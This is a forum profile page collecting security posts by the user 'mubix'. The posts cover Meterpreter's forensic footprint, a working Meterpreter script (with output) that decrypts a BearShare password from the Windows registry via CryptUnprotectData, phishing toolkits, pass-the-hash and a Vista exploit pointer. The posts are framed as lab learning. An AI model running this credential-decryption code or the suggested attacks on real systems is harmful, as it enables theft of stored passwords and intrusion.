Jump to content

mubix

Dedicated Members
 View Profile  See their activity

  • Posts

    516

  • Joined

  • Last visited

  • Days Won

    3

 Content Type 

Posts posted by mubix

    Meterpreter - what lasting effect does it have on a system?

    in Security

    Posted

    Honestly these guys covered it really well. Technically Meterpreter itself operates only in memory. So really the only effect it has is when memory is referenced / accessed / or stored (ie. System Profiling software, Normal process execution, and Hibernate respectively). The more evident parts come in a few flavors:

    • How the Meterpreter shellcode / payload gets executed.
      • Is it a binary you put your payload in? a PDF?
        • Where was it stored?
          • Is it backed up?
          • Is it in a location targeted by Volume Shadow Copies or Restore Points?
          • Does the company have a shared storage of roaming profiles?
      • How was it delivered?
        • Was the delivery encrypted?
        • Was it a single delivery or to many hosts/users?
    • What C2 mechanism is used? HTTP/TCP/DNS/etc?
      • Are the comms encrypted?
      • Do they go trough a proxy?

    These are just a small number of questions, and many you can ask in a lab. Run SecurityOnion's live CD, with a pfSense firewall running Squid, put an XP VM behind them and toss your Social Engineering payload at it with your attack C2 outside of it. Use Sys Internals Process Monitor on the victim. Make sure Bro, and all the other gadets and gizmos SecurityOnion has are enabled and in-line.

    I guarantee you'll learn a ton just setting everything up, and a ton more once you test out your first SE.

    Decrypting a Hex code from Registry

    in Security

    Posted

    If you still have the ability to login as that user, forced password change or not, I think you should still be able to decrypt the password. I forced a password change from one administrator account to the other and once logged in (as the user with bearshare installed) still able to decrypt the bearshare password

    Decrypting a Hex code from Registry

    in Security

    Posted · Edited by mubix

    Ya, it was password stored in the users store. Wrote a quick script to decrypt: (mostly stolen from post/windows/gather/credentials/outlook.rb)

    def prepare_railgun
		rg = session.railgun
		if (!rg.get_dll('crypt32'))
				rg.add_dll('crypt32')
		end
end

def decrypt_password(data)
		rg = session.railgun
		pid = client.sys.process.getpid
		process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)

		mem = process.memory.allocate(128)
		process.memory.write(mem, data)

		if session.sys.process.each_process.find { |i| i["pid"] == pid} ["arch"] == "x86"
				addr = [mem].pack("V")
				len = [data.length].pack("V")
				ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8)
				#print_status("#{ret.inspect}")
				len, addr = ret["pDataOut"].unpack("V2")
		else
				addr = [mem].pack("Q")
				len = [data.length].pack("Q")
				ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 16)
				len, addr = ret["pDataOut"].unpack("Q2")
		end

		return "" if len == 0
		decrypted_pw = process.memory.read(addr, len)
		return decrypted_pw
end

def get_valdata(k, name)
		@key_base = 'HKCU\\Software\\BearShare\\Users\\superuser@mailinator.com'
		registry_getvaldata("#{@key_base}\\#{k}", name)
end

prepare_railgun
data = get_valdata("",'Password')
print_error data.inspect
password = decrypt_password(data)
print_status password.inspect

    And got the following output when logged in as Administrator (who installed Bearshare) and with the password of 'password'

    meterpreter > run decrypt_bearshare
[-] "\x01\x00\x00\x00\xD0\x8C\x9D\xDF\x01\x15\xD1\x11\x8Cz\x00\xC0O\xC2\x97\xEB\x01\x00\x00\x00\xEC\x01\xFB\x97\x80\xD7qF\x95\xA76b&\xC87U\
x00\x00\x00\x00 \x00\x00\x00E\x00n\x00c\x00r\x00y\x00p\x00t\x00e\x00d\x00S\x00t\x00r\x00i\x00n\x00g\x00\x00\x00\x03f\x00\x00\xA8\x00\x00\x0
0\x10\x00\x00\x00\x10\x97\xE4\xA5m\xCD\x85PI\xC67\x1Da\xB4\xBB<\x00\x00\x00\x00\x04\x80\x00\x00\xA0\x00\x00\x00\x10\x00\x00\x00\x06\xC8\x01
\x9C\xB7I\x10BL\x14{\x9D\xF5\xECp\a\x10\x00\x00\x00\xD8\xF4\vB\xE8(\xFB^\xF2\x9F\x10\xFC>cnG\x14\x00\x00\x00\xC5z\a\xD3?\xD7\xDEz0\x0E\xD8\
x9E\xC11.d\x96\x95 \xC6"
[*] "password\x00"

    I then exported the entire registry tree for Bearshare and moved it to a new user 'bob', importing it as it was from Administrator:

    meterpreter > run decrypt_bearshare
[-] "\x01\x00\x00\x00\xD0\x8C\x9D\xDF\x01\x15\xD1\x11\x8Cz\x00\xC0O\xC2\x97\xEB\x01\x00\x00\x00\xEC\x01\xFB\x97\x80\xD7qF\x95\xA76b&\xC87U\
x00\x00\x00\x00 \x00\x00\x00E\x00n\x00c\x00r\x00y\x00p\x00t\x00e\x00d\x00S\x00t\x00r\x00i\x00n\x00g\x00\x00\x00\x03f\x00\x00\xA8\x00\x00\x0
0\x10\x00\x00\x00\x10\x97\xE4\xA5m\xCD\x85PI\xC67\x1Da\xB4\xBB<\x00\x00\x00\x00\x04\x80\x00\x00\xA0\x00\x00\x00\x10\x00\x00\x00\x06\xC8\x01
\x9C\xB7I\x10BL\x14{\x9D\xF5\xECp\a\x10\x00\x00\x00\xD8\xF4\vB\xE8(\xFB^\xF2\x9F\x10\xFC>cnG\x14\x00\x00\x00\xC5z\a\xD3?\xD7\xDEz0\x0E\xD8\
x9E\xC11.d\x96\x95 \xC6"
[*] ""

    No joy (as expected)

    Phish Pages

    in WiFi Pineapple Mark IV

    Posted

    I would start with SET (Social Engineering Toolkit) and look at how it does things. There is also SEF (Social Engineering Framework), MetaPhish, and Spear Fishing Toolkit. I think there is also one called FBPwn but I think it's just Java Applet + Facebook.

    Metasploit And Vista

    in Questions

    Posted

    Hi

    Im using armitage and metasploit.

    Im trying to attack windows vista machine at my home. the target machine is mine.

    Only machine that I have been able to attack and gain access is windows 2000.

    So what exploits should I use. Please help me, Im just trying to learn to use metasploit.

    What is the machine vulnerable to? What patches have been applied? Are your looking to do a completely remote attack against an unused fresh build of Vista? You can try 09_050. Might work.

    Room362.com

    in Everything Else

    Posted · Edited by mubix

    I have a lot of work to do on camera, and hopefully that is something that I can keep gettng better at going forward. That's very cool that you're working in bio exploitation. Which field?

    I have a make up metasploit segment in the queue, it's really hard to know when you aren't up to par when there s no one to give you instant feedback now that there is no hakhouse..

    Exploit Password

    in Hak5

    Posted

    You can use pass-the-hash, where you don't know the password, but you have the hash. Many organizations use the same password for the local admin on all the boxes in an environment, as a NTLM or LM hash is the same for the same password no matter what box you have the account on, that hash can act just like the password.

    Room362.com

    in Everything Else

    Posted

    Hahaha shit... Yeah that is from Mubix. Probably the worst guest the show keeps bringing back. Are you fucking kiding me? I assume Mubix is part of a team. I assume they're brining unpublished she-at to the table, nope. They're jusy making a tag line to attract hack-forum members.

    Thanks for the constructive critisim. What don't you like about it?

    Episode 5x22

    in Hak5

    Posted

    I can't believe Mubix was so rude about Mac OS X not being a 'proper platform', it kind of undermined any respect he may have built up in previous episodes, he just sounded like a 14 year old script kid.

    Mac OS X doesn't allow access to /dev/mem presumably for security reasons.

    It was all in fun. I will actually be obtaining my first Mac in the not so distant future. I apologize if my comment offended you or any way hindered your respect for me.

    ServifyThis

    in Hak5

    Posted

    I just saw a post on mubix' blog in which he mentioned ServifyThis (hxxp://www.inguardians.com/pubs/servifythis/). It looks an interesting tool and maybe could be featured in a future episode?

    I love the tool and I think that's an awesome idea.

×
×
  • Create New...